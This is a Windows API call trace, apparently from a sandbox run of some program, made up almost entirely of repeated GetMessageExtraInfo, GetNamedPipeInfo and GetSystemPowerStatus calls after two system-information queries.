	[0025.549] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.549] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0026.336] lstrlenW (lpString="") returned 0
	[0026.336] GetMessageExtraInfo () returned 0x0
	[0026.336] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.336] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.336] GetMessageExtraInfo () returned 0x0
	[0026.336] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.336] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.336] GetMessageExtraInfo () returned 0x0
	[0026.336] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.336] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.336] GetMessageExtraInfo () returned 0x0
	[0026.336] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.336] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.336] GetMessageExtraInfo () returned 0x0
	[0026.336] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.336] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.336] GetMessageExtraInfo () returned 0x0
	[0026.336] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.337] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.337] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.337] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.338] GetMessageExtraInfo () returned 0x0
	[0026.338] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.338] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.339] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.339] GetMessageExtraInfo () returned 0x0
	[0026.339] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.340] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.340] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.340] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
